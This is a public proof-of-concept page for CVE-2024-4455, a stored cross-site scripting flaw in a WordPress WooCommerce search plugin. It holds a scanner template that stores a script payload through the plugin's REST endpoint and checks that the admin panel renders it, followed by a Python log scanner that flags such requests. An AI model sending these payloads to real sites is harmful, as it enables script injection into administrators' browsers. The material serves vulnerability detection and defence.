The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'queryString' parameter in the REST API endpoint /ywcas/v1/register in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping.
PoC code [public]
id: CVE-2024-4455

info:
  name: YITH WooCommerce Ajax Search <= 2.4.0 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: high
  description: |
    The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'queryString' parameter in the REST API endpoint /ywcas/v1/register in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping.
  impact: |
    Attackers can execute arbitrary scripts in users' browsers, potentially leading to session hijacking, defacement, or redirection.
  remediation: |
    Update YITH WooCommerce Ajax Search plugin to version 2.4.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4455
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf0f5fd4-cd06-4d11-9f22-1f417b546afb
    - https://patchstack.com/database/vulnerability/yith-woocommerce-ajax-search/wordpress-yith-woocommerce-ajax-search-plugin-2-4-0-unauthenticated-stored-cross-site-scripting-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2024-4455
    epss-score: 0.07954
    epss-percentile: 0.91784
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 4
    vendor: yithemes
    product: yith-woocommerce-ajax-search
    framework: wordpress
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,yith,woocommerce,authenticated,vkev

flow: (http(1) && http(2)) || (http(3) && http(4))

http:
  # Request 1: confirm the plugin is installed and read its version from readme.txt
  - raw:
      - |
        GET /wp-content/plugins/yith-woocommerce-ajax-search/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 2.4.0')"
          - "contains(body, 'YITH WooCommerce Ajax Search')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  # Request 2: unauthenticated write to the search logger via the REST endpoint
  - raw:
      - |
        GET /?rest_route=/ywcas/v1/register&queryString=<script>alert(document.domain)</script>&totalResults=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        part: body
        regex:
          - '"loggerID":\s*[0-9]+'

  # Request 3: authenticate (blank line separates headers from the form body)
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

  # Request 4: the stored value is rendered unescaped in the admin statistics panel
  - raw:
      - |
        GET /wp-admin/admin.php?page=yith_wcas_panel&tab=statistic&from&to&view_all=no_results HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Query\"><script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e26e925ee27afc40974d038a27ac059de0894fcf1f5d237441b325fd6166651402202a0895d02183ca55d8a8d2f1525f2ed2c1a7bc7756f2141090713b9a564e46b0:922c64590222798bb761d5b6d8e72950
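The injection point in the template above is the queryString parameter of the /ywcas/v1/register REST route. As an added example (not part of the template, the plugin, or any real traffic), the following Python scans web-server access logs for requests that reach that endpoint, via either ?rest_route= or the /wp-json/ prefix, and flags a queryString carrying markup instead of a search term; the log lines are constructed for the demonstration.

```python
"""Added example: flag access-log requests that hit the /ywcas/v1/register
endpoint with markup in queryString (the CVE-2024-4455 injection point)."""
import re
from html import unescape
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache/nginx "combined" log format; only the client IP and request target are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/ywcas/v1/register"  # reachable via ?rest_route=... or /wp-json/
# Tags, event handlers or javascript: URLs in a stored search term are not search input.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def inspect_request(target):
    """Return queryString details if the request targets the logger endpoint, else None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    rest_route = unquote_plus(params.get("rest_route", [""])[0])
    if ENDPOINT not in parts.path and ENDPOINT not in rest_route:
        return None
    raw = params.get("queryString", [""])[0]
    # parse_qs already URL-decoded once; decode again (and HTML entities) so double-encoded values are still checked.
    value = unescape(unquote_plus(raw))
    return {"queryString": value, "suspicious": bool(MARKUP_RE.search(value))}


def scan_log(lines):
    """Return (client_ip, decoded queryString) for each suspicious hit on the endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        info = inspect_request(m.group("target"))
        if info and info["suspicious"]:
            hits.append((m.group("ip"), info["queryString"]))
    return hits


# Constructed sample log lines (not real traffic); the first mirrors the template's probe request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2024:12:00:01 +0000] "GET /?rest_route=/ywcas/v1/register&queryString=%3Cscript%3Ealert(document.domain)%3C/script%3E&totalResults=0 HTTP/1.1" 200 45 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Jun/2024:12:00:02 +0000] "GET /wp-json/ywcas/v1/register?queryString=blue+shirt&totalResults=3 HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Jun/2024:12:00:03 +0000] "GET /wp-content/plugins/yith-woocommerce-ajax-search/readme.txt HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, query in scan_log(SAMPLE_LOG):
        print(f"suspicious queryString from {ip}: {query!r}")
```

Only the first sample line is reported; the legitimate search and the readme.txt fetch pass through, so the check can run over a full day's log without flagging normal plugin use.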